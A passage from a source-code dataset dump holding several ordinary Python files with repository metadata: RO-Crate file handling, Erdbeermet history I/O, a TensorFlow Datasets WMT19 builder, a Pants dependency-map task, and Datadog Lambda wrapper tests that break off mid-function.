if rval and "Dataset" in rval.type:
return rval
return None
@property
def test_metadata_path(self):
if self.test_dir is None:
return None
return Path(self.test_dir.filepath()) / TEST_METADATA_BASENAME
def resolve_id(self, relative_id):
return generate.arcp_random(relative_id.strip('./'), uuid=self.uuid)
def get_entities(self):
return (self.default_entities + self.data_entities +
self.contextual_entities)
def set_main_entity(self, main_entity):
self.root_dataset['mainEntity'] = main_entity
def _get_root_jsonld(self):
self.root_dataset.properties()
def dereference(self, entity_id):
canonical_id = self.resolve_id(entity_id)
for entity in self.get_entities():
if canonical_id == entity.canonical_id():
return entity
return None
def add_file(self, source, crate_path=None, fetch_remote=False,
properties={}, **kwargs):
props = dict(properties)
props.update(kwargs)
file_entity = File(self, source=source, dest_path=crate_path, fetch_remote=fetch_remote, properties=props)
self._add_data_entity(file_entity)
return file_entity
def remove_file(self, file_id):
self._remove_data_entity(file_id)
def add_directory(self, source, crate_path=None, properties={}, **kwargs):
props = dict(properties)
props.update(kwargs)
dataset_entity = Dataset(self, source, crate_path, properties)
self._add_data_entity(dataset_entity)
return dataset_entity
def remove_directory(self, dir_id):
self._remove_data_entity(dir_id)
def _add_data_entity(self, data_entity):
self._remove_data_entity(data_entity)
self.data_entities.append(data_entity)
def _remove_data_entity(self, data_entity):
if data_entity in self.data_entities:
self.data_entities.remove(data_entity)
wZip64=True
)
for writable_entity in self.data_entities + self.default_entities:
writable_entity.write_zip(zf)
zf.close()
return zf.filename
| true | true |
f718fbc2d26d5ffb3491afb7372ff14d83ab4105 | 2,368 | py | Python | src/erdbeermet/tools/FileIO.py | bnittka/Erdbeermet | 43c73d4cf3a918090320c7519a9ea09014f46744 | [
"MIT"
] | 5 | 2021-12-02T14:53:02.000Z | 2022-01-03T08:24:16.000Z | src/erdbeermet/tools/FileIO.py | bnittka/Erdbeermet | 43c73d4cf3a918090320c7519a9ea09014f46744 | [
"MIT"
] | 1 | 2022-01-10T09:07:44.000Z | 2022-01-10T10:20:07.000Z | src/erdbeermet/tools/FileIO.py | bnittka/Erdbeermet | 43c73d4cf3a918090320c7519a9ea09014f46744 | [
"MIT"
] | 7 | 2021-12-13T14:56:33.000Z | 2022-01-18T17:47:38.000Z | # -*- coding: utf-8 -*-
import re
def write_history(filename, history):
with open(filename, 'w') as f:
start = True
for x, y, z, alpha, delta in history:
delta_str = '[' + ','.join(str(d) for d in delta) + ']'
if start:
f.write(f"({x}, {y}: {z}) {alpha}; {delta_str}")
start = False
else:
f.write(f"\n({x}, {y}: {z}) {alpha}; {delta_str}")
def _split_floats(floats):
return [float(item) for item in floats.split(',')]
def parse_history(filename):
event_regex = re.compile(r"\((\d+)\,\s*(\d+)\:\s*(\d+)\)\;?\s*(\d+\.?\d*e?-?\d+)\;\s*\[(?P<delta>(\s*\d+\.?\d*e?-?\d+,?)+)\]")
with open(filename, 'r') as f:
lines = f.readlines()
history = []
for line in lines:
match = event_regex.match(line.strip())
if match:
x = int(match.group(1))
y = int(match.group(2))
z = int(match.group(3))
alpha = float(match.group(4))
delta = _split_floats(match.group('delta'))
history.append((x, y, z, alpha, delta))
return history
def _write_matrix(f, V, D):
for i in range(len(V)):
f.write(f'\n{V[i]} ')
for j in range(len(V)):
f.write('{: 12.8f}'.format(D[i,j]))
def write_recognition(filename, tree, matrices=True):
with open(filename, 'w') as f:
start = True
for v in tree.preorder():
if not start:
f.write('\n')
f.write(80 * '-')
f.write('\n')
else:
start = False
f.write(f'n={v.n}\n')
if v.R_step is not None:
f.write('(result of R-step: ({},{}:{}){:.8f})\n'.format(*v.R_step))
f.write(f'V={v.V}\n')
f.write(f'total successes of this branch: {v.valid_ways}\n')
if matrices and v.D is not None:
f.write(f'Matrix on {v.n} elements:\n')
_write_matrix(f, v.V, v.D)
f.write('\n')
if not v.valid_ways:
f.write(f'reason of abort: {v.info}\n')
| 26.909091 | 130 | 0.425676 |
import re
def write_history(filename, history):
with open(filename, 'w') as f:
start = True
for x, y, z, alpha, delta in history:
delta_str = '[' + ','.join(str(d) for d in delta) + ']'
if start:
f.write(f"({x}, {y}: {z}) {alpha}; {delta_str}")
start = False
else:
f.write(f"\n({x}, {y}: {z}) {alpha}; {delta_str}")
def _split_floats(floats):
return [float(item) for item in floats.split(',')]
def parse_history(filename):
event_regex = re.compile(r"\((\d+)\,\s*(\d+)\:\s*(\d+)\)\;?\s*(\d+\.?\d*e?-?\d+)\;\s*\[(?P<delta>(\s*\d+\.?\d*e?-?\d+,?)+)\]")
with open(filename, 'r') as f:
lines = f.readlines()
history = []
for line in lines:
match = event_regex.match(line.strip())
if match:
x = int(match.group(1))
y = int(match.group(2))
z = int(match.group(3))
alpha = float(match.group(4))
delta = _split_floats(match.group('delta'))
history.append((x, y, z, alpha, delta))
return history
def _write_matrix(f, V, D):
for i in range(len(V)):
f.write(f'\n{V[i]} ')
for j in range(len(V)):
f.write('{: 12.8f}'.format(D[i,j]))
def write_recognition(filename, tree, matrices=True):
with open(filename, 'w') as f:
start = True
for v in tree.preorder():
if not start:
f.write('\n')
f.write(80 * '-')
f.write('\n')
else:
start = False
f.write(f'n={v.n}\n')
if v.R_step is not None:
f.write('(result of R-step: ({},{}:{}){:.8f})\n'.format(*v.R_step))
f.write(f'V={v.V}\n')
f.write(f'total successes of this branch: {v.valid_ways}\n')
if matrices and v.D is not None:
f.write(f'Matrix on {v.n} elements:\n')
_write_matrix(f, v.V, v.D)
f.write('\n')
if not v.valid_ways:
f.write(f'reason of abort: {v.info}\n')
| true | true |
f718fd3a703f958aab1607b729f55dd3d248123d | 2,222 | py | Python | tensorflow_datasets/translate/wmt19.py | leenamaheshnikam10/datasets | 762cc556c364ecbb930b825709aa81647d889300 | [
"Apache-2.0"
] | 2 | 2019-10-20T05:40:10.000Z | 2019-10-31T17:25:52.000Z | tensorflow_datasets/translate/wmt19.py | thanhkaist/datasets | 02da35c558ec8ea704e744a2008c5cecb2e7a0a1 | [
"Apache-2.0"
] | 1 | 2019-04-09T07:50:49.000Z | 2019-04-09T07:51:10.000Z | tensorflow_datasets/translate/wmt19.py | thanhkaist/datasets | 02da35c558ec8ea704e744a2008c5cecb2e7a0a1 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# Copyright 2019 The TensorFlow Datasets Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""WMT19: Translate dataset."""
import tensorflow_datasets.public_api as tfds
from tensorflow_datasets.translate import wmt
_URL = "http://www.statmt.org/wmt19/translation-task.html"
# TODO(adarob): Update with citation of overview paper once it is published.
_CITATION = """
@ONLINE {wmt19translate,
author = "Wikimedia Foundation",
title = "ACL 2019 Fourth Conference on Machine Translation (WMT19), Shared Task: Machine Translation of News",
url = "http://www.statmt.org/wmt19/translation-task.html"
}
"""
_LANGUAGE_PAIRS = [
(lang, "en") for lang in ["cs", "de", "fi", "gu", "kk", "lt", "ru", "zh"]
] + [("fr", "de")]
class Wmt19Translate(wmt.WmtTranslate):
  """WMT 19 translation datasets for {(xx, "en")} + ("fr", "de") pairs."""
  # One BuilderConfig per language pair: eight xx->en pairs plus fr-de.
  BUILDER_CONFIGS = [
      wmt.WmtConfig(  # pylint:disable=g-complex-comprehension
          description="WMT 2019 %s-%s translation task dataset." % (l1, l2),
          url=_URL,
          citation=_CITATION,
          language_pair=(l1, l2),
          version="0.0.3")
      for l1, l2 in _LANGUAGE_PAIRS
  ]
  @property
  def _subsets(self):
    # Maps each split to the WMT corpus subset names it is assembled from;
    # consumed by the WmtTranslate base class when generating examples.
    return {
        tfds.Split.TRAIN: [
            "europarl_v9", "europarl_v7_frde", "paracrawl_v3",
            "paracrawl_v1_ru", "paracrawl_v3_frde", "commoncrawl",
            "commoncrawl_frde", "newscommentary_v14", "newscommentary_v14_frde",
            "czeng_17", "yandexcorpus", "wikititles_v1", "uncorpus_v1",
            "rapid_2016_ltfi", "rapid_2019"] + wmt.CWMT_SUBSET_NAMES,
        tfds.Split.VALIDATION: [
            "euelections_dev2019", "newsdev2019", "newstest2018"]
    }
| 36.42623 | 115 | 0.673267 |
import tensorflow_datasets.public_api as tfds
from tensorflow_datasets.translate import wmt
_URL = "http://www.statmt.org/wmt19/translation-task.html"
_CITATION = """
@ONLINE {wmt19translate,
author = "Wikimedia Foundation",
title = "ACL 2019 Fourth Conference on Machine Translation (WMT19), Shared Task: Machine Translation of News",
url = "http://www.statmt.org/wmt19/translation-task.html"
}
"""
_LANGUAGE_PAIRS = [
(lang, "en") for lang in ["cs", "de", "fi", "gu", "kk", "lt", "ru", "zh"]
] + [("fr", "de")]
class Wmt19Translate(wmt.WmtTranslate):
BUILDER_CONFIGS = [
wmt.WmtConfig(
description="WMT 2019 %s-%s translation task dataset." % (l1, l2),
url=_URL,
citation=_CITATION,
language_pair=(l1, l2),
version="0.0.3")
for l1, l2 in _LANGUAGE_PAIRS
]
@property
def _subsets(self):
return {
tfds.Split.TRAIN: [
"europarl_v9", "europarl_v7_frde", "paracrawl_v3",
"paracrawl_v1_ru", "paracrawl_v3_frde", "commoncrawl",
"commoncrawl_frde", "newscommentary_v14", "newscommentary_v14_frde",
"czeng_17", "yandexcorpus", "wikititles_v1", "uncorpus_v1",
"rapid_2016_ltfi", "rapid_2019"] + wmt.CWMT_SUBSET_NAMES,
tfds.Split.VALIDATION: [
"euelections_dev2019", "newsdev2019", "newstest2018"]
}
| true | true |
f71900153bd1b94d6b9815bcc58db5cfd55c8cd4 | 8,530 | py | Python | src/python/twitter/pants/tasks/depmap.py | wfarner/commons | 42988a7a49f012665174538cca53604c7846ee86 | [
"Apache-2.0"
] | 1 | 2019-12-20T14:13:27.000Z | 2019-12-20T14:13:27.000Z | src/python/twitter/pants/tasks/depmap.py | wfarner/commons | 42988a7a49f012665174538cca53604c7846ee86 | [
"Apache-2.0"
] | null | null | null | src/python/twitter/pants/tasks/depmap.py | wfarner/commons | 42988a7a49f012665174538cca53604c7846ee86 | [
"Apache-2.0"
] | 1 | 2019-12-20T14:13:29.000Z | 2019-12-20T14:13:29.000Z | # ==================================================================================================
# Copyright 2011 Twitter, Inc.
# --------------------------------------------------------------------------------------------------
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this work except in compliance with the License.
# You may obtain a copy of the License in the LICENSE file, or at:
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==================================================================================================
from __future__ import print_function
from twitter.pants.tasks.console_task import ConsoleTask
from twitter.pants.tasks import TaskError
from twitter.pants import is_jvm, is_jvm_app, is_python, is_concrete
from twitter.pants.targets.jar_dependency import JarDependency
class Depmap(ConsoleTask):
  """Generates either a textual dependency tree or a graphviz digraph dot file for the dependency
  set of a target.
  """
  @staticmethod
  def _is_jvm(dep):
    # JVM applications count as JVM targets for dependency-mapping purposes.
    return is_jvm(dep) or is_jvm_app(dep)
  @classmethod
  def setup_parser(cls, option_group, args, mkflags):
    """Registers the depmap command-line options.

    The internal/external flag names are stored on the class so __init__
    can reference them in its mutual-exclusion error message.
    """
    super(Depmap, cls).setup_parser(option_group, args, mkflags)
    cls.internal_only_flag = mkflags("internal-only")
    cls.external_only_flag = mkflags("external-only")
    option_group.add_option(cls.internal_only_flag,
                            action="store_true",
                            dest="depmap_is_internal_only",
                            default=False,
                            help='Specifies that only internal dependencies should'
                                 ' be included in the graph output (no external jars).')
    option_group.add_option(cls.external_only_flag,
                            action="store_true",
                            dest="depmap_is_external_only",
                            default=False,
                            help='Specifies that only external dependencies should'
                                 ' be included in the graph output (only external jars).')
    option_group.add_option(mkflags("minimal"),
                            action="store_true",
                            dest="depmap_is_minimal",
                            default=False,
                            help='For a textual dependency tree, only prints a dependency the 1st'
                                 ' time it is encountered. For graph output this does nothing.')
    option_group.add_option(mkflags("separator"),
                            dest="depmap_separator",
                            default="-",
                            help='Specifies the separator to use between the org/name/rev'
                                 ' components of a dependency\'s fully qualified name.')
    option_group.add_option(mkflags("graph"),
                            action="store_true",
                            dest="depmap_is_graph",
                            default=False,
                            help='Specifies the internal dependency graph should be'
                                 ' output in the dot digraph format')
  def __init__(self, context):
    ConsoleTask.__init__(self, context)
    # --internal-only and --external-only are mutually exclusive.
    if (self.context.options.depmap_is_internal_only
        and self.context.options.depmap_is_external_only):
      cls = self.__class__
      error_str = "At most one of %s or %s can be selected." % (cls.internal_only_flag,
                                                                cls.external_only_flag)
      raise TaskError(error_str)
    self.is_internal_only = self.context.options.depmap_is_internal_only
    self.is_external_only = self.context.options.depmap_is_external_only
    self.is_minimal = self.context.options.depmap_is_minimal
    self.is_graph = self.context.options.depmap_is_graph
    self.separator = self.context.options.depmap_separator
  def console_output(self, targets):
    """Renders the dependency tree or dot graph for the first JVM target root.

    Raises TaskError when no roots are given or a root is not a JVM target.
    """
    if len(self.context.target_roots) == 0:
      raise TaskError("One or more target addresses are required.")
    for target in self.context.target_roots:
      if all(self._is_jvm(t) for t in target.resolve() if is_concrete(t)):
        if self.is_graph:
          return self._output_digraph(target)
        else:
          return self._output_dependency_tree(target)
      elif is_python(target):
        raise TaskError('Unsupported for Python targets')
      else:
        raise TaskError('Unsupported for target %s' % target)
  def _dep_id(self, dependency):
    """Returns a tuple of dependency_id , is_internal_dep."""
    params = dict(sep=self.separator)
    if isinstance(dependency, JarDependency):
      params.update(org=dependency.org, name=dependency.name, rev=dependency.rev)
    else:
      # Internal targets have no org/rev; mark them with a synthetic org.
      params.update(org='internal', name=dependency.id)
    # Only external jars carry a rev, so its presence distinguishes the two.
    if params.get('rev'):
      return "%(org)s%(sep)s%(name)s%(sep)s%(rev)s" % params, False
    else:
      return "%(org)s%(sep)s%(name)s" % params, True
  def _output_dependency_tree(self, target):
    """Returns the lines of the textual dependency tree for *target*."""
    def output_dep(dep, indent):
      return "%s%s" % (indent * " ", dep)
    def output_deps(dep, indent=0, outputted=set()):
      # NOTE(review): the mutable default `outputted` is re-created on each
      # call of _output_dependency_tree (the def re-executes), so sharing
      # is scoped to a single tree rendering — presumably intentional.
      dep_id, _ = self._dep_id(dep)
      if dep_id in outputted:
        # Repeat visits are starred, unless minimal mode suppresses them.
        return [output_dep("*%s" % dep_id, indent)] if not self.is_minimal else []
      else:
        output = []
        if not self.is_external_only:
          output += [output_dep(dep_id, indent)]
          outputted.add(dep_id)
          indent += 1
        if self._is_jvm(dep):
          for internal_dep in dep.internal_dependencies:
            output += output_deps(internal_dep, indent, outputted)
        if not self.is_internal_only:
          if self._is_jvm(dep):
            for jar_dep in dep.jar_dependencies:
              jar_dep_id, internal = self._dep_id(jar_dep)
              if not internal:
                if jar_dep_id not in outputted or (not self.is_minimal
                                                   and not self.is_external_only):
                  output += [output_dep(jar_dep_id, indent)]
                  outputted.add(jar_dep_id)
        return output
    return [dependency for t in target.resolve() for dependency in output_deps(t)]
  def _output_digraph(self, target):
    """Returns the lines of a graphviz dot digraph for *target*'s dependencies."""
    def output_candidate(internal):
      # A dep is emitted when its internal/external kind matches the flags.
      return ((self.is_internal_only and internal)
              or (self.is_external_only and not internal)
              or (not self.is_internal_only and not self.is_external_only))
    def output_dep(dep):
      # Node styling: internal deps get the "science" fill, com.twitter
      # jars a lighter fill, everything else a bare node.
      dep_id, internal = self._dep_id(dep)
      science_styled = internal and not self.is_internal_only
      twitter_styled = not internal and dep.org.startswith('com.twitter')
      if science_styled:
        fmt = ' "%(id)s" [label="%(id)s", style="filled", fillcolor="#0084b4", fontcolor="white"];'
        return fmt % {'id': dep_id}
      elif twitter_styled:
        return ' "%s" [style="filled", fillcolor="#c0deed"];' % dep_id
      else:
        return ' "%s";' % dep_id
    def output_deps(outputted, dep):
      # `outputted` tracks both emitted nodes and emitted (left, right)
      # edges so each appears at most once in the dot output.
      output = []
      if dep not in outputted:
        outputted.add(dep)
        for dependency in dep.resolve():
          if self._is_jvm(dependency):
            for internal_dependency in dependency.internal_dependencies:
              output += output_deps(outputted, internal_dependency)
          for jar in (dependency.jar_dependencies if self._is_jvm(dependency) else [dependency]):
            jar_id, internal = self._dep_id(jar)
            if output_candidate(internal):
              if jar not in outputted:
                output += [output_dep(jar)]
                outputted.add(jar)
              target_id, _ = self._dep_id(target)
              dep_id, _ = self._dep_id(dependency)
              # In external-only mode all edges originate from the root.
              left_id = target_id if self.is_external_only else dep_id
              if (left_id, jar_id) not in outputted:
                styled = internal and not self.is_internal_only
                output += [' "%s" -> "%s"%s;' % (left_id, jar_id,
                                                 ' [style="dashed"]' if styled else '')]
                outputted.add((left_id, jar_id))
      return output
    return ['digraph "%s" {' % target.id, output_dep(target)] + output_deps(set(), target) + ['}']
| 43.520408 | 100 | 0.59027 |
from __future__ import print_function
from twitter.pants.tasks.console_task import ConsoleTask
from twitter.pants.tasks import TaskError
from twitter.pants import is_jvm, is_jvm_app, is_python, is_concrete
from twitter.pants.targets.jar_dependency import JarDependency
class Depmap(ConsoleTask):
@staticmethod
def _is_jvm(dep):
return is_jvm(dep) or is_jvm_app(dep)
@classmethod
def setup_parser(cls, option_group, args, mkflags):
super(Depmap, cls).setup_parser(option_group, args, mkflags)
cls.internal_only_flag = mkflags("internal-only")
cls.external_only_flag = mkflags("external-only")
option_group.add_option(cls.internal_only_flag,
action="store_true",
dest="depmap_is_internal_only",
default=False,
help='Specifies that only internal dependencies should'
' be included in the graph output (no external jars).')
option_group.add_option(cls.external_only_flag,
action="store_true",
dest="depmap_is_external_only",
default=False,
help='Specifies that only external dependencies should'
' be included in the graph output (only external jars).')
option_group.add_option(mkflags("minimal"),
action="store_true",
dest="depmap_is_minimal",
default=False,
help='For a textual dependency tree, only prints a dependency the 1st'
' time it is encountered. For graph output this does nothing.')
option_group.add_option(mkflags("separator"),
dest="depmap_separator",
default="-",
help='Specifies the separator to use between the org/name/rev'
' components of a dependency\'s fully qualified name.')
option_group.add_option(mkflags("graph"),
action="store_true",
dest="depmap_is_graph",
default=False,
help='Specifies the internal dependency graph should be'
' output in the dot digraph format')
def __init__(self, context):
ConsoleTask.__init__(self, context)
if (self.context.options.depmap_is_internal_only
and self.context.options.depmap_is_external_only):
cls = self.__class__
error_str = "At most one of %s or %s can be selected." % (cls.internal_only_flag,
cls.external_only_flag)
raise TaskError(error_str)
self.is_internal_only = self.context.options.depmap_is_internal_only
self.is_external_only = self.context.options.depmap_is_external_only
self.is_minimal = self.context.options.depmap_is_minimal
self.is_graph = self.context.options.depmap_is_graph
self.separator = self.context.options.depmap_separator
def console_output(self, targets):
if len(self.context.target_roots) == 0:
raise TaskError("One or more target addresses are required.")
for target in self.context.target_roots:
if all(self._is_jvm(t) for t in target.resolve() if is_concrete(t)):
if self.is_graph:
return self._output_digraph(target)
else:
return self._output_dependency_tree(target)
elif is_python(target):
raise TaskError('Unsupported for Python targets')
else:
raise TaskError('Unsupported for target %s' % target)
def _dep_id(self, dependency):
params = dict(sep=self.separator)
if isinstance(dependency, JarDependency):
params.update(org=dependency.org, name=dependency.name, rev=dependency.rev)
else:
params.update(org='internal', name=dependency.id)
if params.get('rev'):
return "%(org)s%(sep)s%(name)s%(sep)s%(rev)s" % params, False
else:
return "%(org)s%(sep)s%(name)s" % params, True
def _output_dependency_tree(self, target):
def output_dep(dep, indent):
return "%s%s" % (indent * " ", dep)
def output_deps(dep, indent=0, outputted=set()):
dep_id, _ = self._dep_id(dep)
if dep_id in outputted:
return [output_dep("*%s" % dep_id, indent)] if not self.is_minimal else []
else:
output = []
if not self.is_external_only:
output += [output_dep(dep_id, indent)]
outputted.add(dep_id)
indent += 1
if self._is_jvm(dep):
for internal_dep in dep.internal_dependencies:
output += output_deps(internal_dep, indent, outputted)
if not self.is_internal_only:
if self._is_jvm(dep):
for jar_dep in dep.jar_dependencies:
jar_dep_id, internal = self._dep_id(jar_dep)
if not internal:
if jar_dep_id not in outputted or (not self.is_minimal
and not self.is_external_only):
output += [output_dep(jar_dep_id, indent)]
outputted.add(jar_dep_id)
return output
return [dependency for t in target.resolve() for dependency in output_deps(t)]
def _output_digraph(self, target):
def output_candidate(internal):
return ((self.is_internal_only and internal)
or (self.is_external_only and not internal)
or (not self.is_internal_only and not self.is_external_only))
def output_dep(dep):
dep_id, internal = self._dep_id(dep)
science_styled = internal and not self.is_internal_only
twitter_styled = not internal and dep.org.startswith('com.twitter')
if science_styled:
fmt = ' "%(id)s" [label="%(id)s", style="filled", fillcolor="#0084b4", fontcolor="white"];'
return fmt % {'id': dep_id}
elif twitter_styled:
return ' "%s" [style="filled", fillcolor="#c0deed"];' % dep_id
else:
return ' "%s";' % dep_id
def output_deps(outputted, dep):
output = []
if dep not in outputted:
outputted.add(dep)
for dependency in dep.resolve():
if self._is_jvm(dependency):
for internal_dependency in dependency.internal_dependencies:
output += output_deps(outputted, internal_dependency)
for jar in (dependency.jar_dependencies if self._is_jvm(dependency) else [dependency]):
jar_id, internal = self._dep_id(jar)
if output_candidate(internal):
if jar not in outputted:
output += [output_dep(jar)]
outputted.add(jar)
target_id, _ = self._dep_id(target)
dep_id, _ = self._dep_id(dependency)
left_id = target_id if self.is_external_only else dep_id
if (left_id, jar_id) not in outputted:
styled = internal and not self.is_internal_only
output += [' "%s" -> "%s"%s;' % (left_id, jar_id,
' [style="dashed"]' if styled else '')]
outputted.add((left_id, jar_id))
return output
return ['digraph "%s" {' % target.id, output_dep(target)] + output_deps(set(), target) + ['}']
| true | true |
f7190276ce7083fff4e92fe7957e9808976cfa88 | 15,748 | py | Python | tests/test_wrapper.py | Neki/datadog-lambda-python | 57cc2404b7d2d8ee5ff7791f41f0036aabd13d0c | [
"Apache-2.0"
] | null | null | null | tests/test_wrapper.py | Neki/datadog-lambda-python | 57cc2404b7d2d8ee5ff7791f41f0036aabd13d0c | [
"Apache-2.0"
] | null | null | null | tests/test_wrapper.py | Neki/datadog-lambda-python | 57cc2404b7d2d8ee5ff7791f41f0036aabd13d0c | [
"Apache-2.0"
] | null | null | null | import os
import unittest
try:
from unittest.mock import patch, call, ANY, MagicMock
except ImportError:
from mock import patch, call, ANY, MagicMock
from datadog_lambda.wrapper import datadog_lambda_wrapper
from datadog_lambda.metric import lambda_metric
from datadog_lambda.thread_stats_writer import ThreadStatsWriter
def get_mock_context(
    aws_request_id="request-id-1",
    memory_limit_in_mb="256",
    invoked_function_arn="arn:aws:lambda:us-west-1:123457598159:function:python-layer-test:1",
    function_version="1",
    client_context=None,
):
    """Build a MagicMock standing in for an AWS Lambda context object.

    Parameters mirror the attributes the wrapper reads off the real Lambda
    context; each defaults to a representative value.

    Returns
    -------
    MagicMock
        A mock with aws_request_id, memory_limit_in_mb,
        invoked_function_arn, function_version and client_context set.
    """
    lambda_context = MagicMock()
    lambda_context.aws_request_id = aws_request_id
    lambda_context.memory_limit_in_mb = memory_limit_in_mb
    lambda_context.invoked_function_arn = invoked_function_arn
    lambda_context.function_version = function_version
    # Fix: the previous `client_context={}` default was a shared mutable
    # dict — mutations leaked across calls. Allocate a fresh dict per call.
    lambda_context.client_context = {} if client_context is None else client_context
    return lambda_context
class TestDatadogLambdaWrapper(unittest.TestCase):
    """Unit tests for @datadog_lambda_wrapper.

    Every collaborator that performs I/O (metric flushing, trace extraction,
    log-correlation injection, patching) is mocked in setUp, so each test
    only inspects the calls the wrapper makes.
    """

    def setUp(self):
        # Force @datadog_lambda_wrapper to always create a real
        # (not no-op) wrapper.
        datadog_lambda_wrapper._force_wrap = True

        patcher = patch(
            "datadog.threadstats.reporters.HttpReporter.flush_distributions"
        )
        self.mock_threadstats_flush_distributions = patcher.start()
        self.addCleanup(patcher.stop)

        patcher = patch("datadog_lambda.wrapper.extract_dd_trace_context")
        self.mock_extract_dd_trace_context = patcher.start()
        self.mock_extract_dd_trace_context.return_value = ({}, None)
        self.addCleanup(patcher.stop)

        patcher = patch("datadog_lambda.wrapper.set_correlation_ids")
        self.mock_set_correlation_ids = patcher.start()
        self.addCleanup(patcher.stop)

        patcher = patch("datadog_lambda.wrapper.inject_correlation_ids")
        self.mock_inject_correlation_ids = patcher.start()
        self.addCleanup(patcher.stop)

        patcher = patch("datadog_lambda.wrapper.patch_all")
        self.mock_patch_all = patcher.start()
        self.addCleanup(patcher.stop)

        patcher = patch("datadog_lambda.cold_start.is_cold_start")
        self.mock_is_cold_start = patcher.start()
        self.mock_is_cold_start.return_value = True
        self.addCleanup(patcher.stop)

        patcher = patch("datadog_lambda.tags.python_version_tuple")
        self.mock_python_version_tuple = patcher.start()
        self.mock_python_version_tuple.return_value = ("2", "7", "10")
        self.addCleanup(patcher.stop)

        patcher = patch("datadog_lambda.metric.write_metric_point_to_stdout")
        self.mock_write_metric_point_to_stdout = patcher.start()
        self.addCleanup(patcher.stop)

        patcher = patch("datadog_lambda.tags.get_library_version_tag")
        self.mock_get_library_version_tag = patcher.start()
        # Mock the layer version so we don't have to update tests on every version bump
        self.mock_get_library_version_tag.return_value = "datadog_lambda:v6.6.6"
        # Fix: this patcher was started but never registered for cleanup,
        # leaking the patch into later tests; its mock handle was also
        # immediately overwritten by the next patcher's handle.
        self.addCleanup(patcher.stop)

        patcher = patch("datadog_lambda.tags._format_dd_lambda_layer_tag")
        self.mock_format_dd_lambda_layer_tag = patcher.start()
        # Mock the layer version so we don't have to update tests on every version bump
        self.mock_format_dd_lambda_layer_tag.return_value = (
            "dd_lambda_layer:datadog-python27_0.1.0"
        )
        self.addCleanup(patcher.stop)

    def test_datadog_lambda_wrapper(self):
        # Happy path: a metric submitted inside the handler is flushed as a
        # distribution, and all tracing hooks fire once.
        @datadog_lambda_wrapper
        def lambda_handler(event, context):
            lambda_metric("test.metric", 100)

        lambda_event = {}
        lambda_context = get_mock_context()
        lambda_handler(lambda_event, lambda_context)
        self.mock_threadstats_flush_distributions.assert_has_calls(
            [
                call(
                    [
                        {
                            "metric": "test.metric",
                            "points": [[ANY, [100]]],
                            "type": "distribution",
                            "host": None,
                            "device": None,
                            "tags": ANY,
                            "interval": 10,
                        }
                    ]
                )
            ]
        )
        self.mock_extract_dd_trace_context.assert_called_with(
            lambda_event, lambda_context, extractor=None
        )
        self.mock_set_correlation_ids.assert_called()
        self.mock_inject_correlation_ids.assert_called()
        self.mock_patch_all.assert_called()

    def test_datadog_lambda_wrapper_flush_to_log(self):
        # With DD_FLUSH_TO_LOG set, metrics go to stdout, not ThreadStats.
        os.environ["DD_FLUSH_TO_LOG"] = "True"

        @datadog_lambda_wrapper
        def lambda_handler(event, context):
            lambda_metric("test.metric", 100)

        lambda_event = {}
        lambda_handler(lambda_event, get_mock_context())

        self.mock_threadstats_flush_distributions.assert_not_called()
        del os.environ["DD_FLUSH_TO_LOG"]

    def test_datadog_lambda_wrapper_flush_in_thread(self):
        # force ThreadStats to flush in thread
        import datadog_lambda.metric as metric_module

        metric_module.lambda_stats.stop()
        metric_module.lambda_stats = ThreadStatsWriter(True)

        @datadog_lambda_wrapper
        def lambda_handler(event, context):
            import time

            lambda_metric("test.metric", 100)
            time.sleep(11)
            # assert flushing in the thread
            self.assertEqual(self.mock_threadstats_flush_distributions.call_count, 1)
            lambda_metric("test.metric", 200)

        lambda_event = {}
        lambda_handler(lambda_event, get_mock_context())
        # assert another flushing in the end
        self.assertEqual(self.mock_threadstats_flush_distributions.call_count, 2)

        # reset ThreadStats
        metric_module.lambda_stats.stop()
        metric_module.lambda_stats = ThreadStatsWriter(False)

    def test_datadog_lambda_wrapper_not_flush_in_thread(self):
        # force ThreadStats to not flush in thread
        import datadog_lambda.metric as metric_module

        metric_module.lambda_stats.stop()
        metric_module.lambda_stats = ThreadStatsWriter(False)

        @datadog_lambda_wrapper
        def lambda_handler(event, context):
            import time

            lambda_metric("test.metric", 100)
            time.sleep(11)
            # assert no flushing in the thread
            self.assertEqual(self.mock_threadstats_flush_distributions.call_count, 0)
            lambda_metric("test.metric", 200)

        lambda_event = {}
        lambda_handler(lambda_event, get_mock_context())
        # assert flushing in the end
        self.assertEqual(self.mock_threadstats_flush_distributions.call_count, 1)

        # reset ThreadStats
        metric_module.lambda_stats.stop()
        metric_module.lambda_stats = ThreadStatsWriter(False)

    def test_datadog_lambda_wrapper_inject_correlation_ids(self):
        # DD_LOGS_INJECTION turns on log/trace correlation hooks.
        os.environ["DD_LOGS_INJECTION"] = "True"

        @datadog_lambda_wrapper
        def lambda_handler(event, context):
            lambda_metric("test.metric", 100)

        lambda_event = {}
        lambda_handler(lambda_event, get_mock_context())
        self.mock_set_correlation_ids.assert_called()
        self.mock_inject_correlation_ids.assert_called()

        del os.environ["DD_LOGS_INJECTION"]

    def test_invocations_metric(self):
        # Each invocation emits the enhanced "invocations" metric with tags
        # derived from the mocked Lambda context.
        @datadog_lambda_wrapper
        def lambda_handler(event, context):
            lambda_metric("test.metric", 100)

        lambda_event = {}
        lambda_handler(lambda_event, get_mock_context())

        self.mock_write_metric_point_to_stdout.assert_has_calls(
            [
                call(
                    "aws.lambda.enhanced.invocations",
                    1,
                    tags=[
                        "region:us-west-1",
                        "account_id:123457598159",
                        "functionname:python-layer-test",
                        "resource:python-layer-test:1",
                        "cold_start:true",
                        "memorysize:256",
                        "runtime:python2.7",
                        "datadog_lambda:v6.6.6",
                        "dd_lambda_layer:datadog-python27_0.1.0",
                    ],
                    timestamp=None,
                )
            ]
        )

    def test_errors_metric(self):
        # A handler that raises still emits "invocations" plus "errors".
        @datadog_lambda_wrapper
        def lambda_handler(event, context):
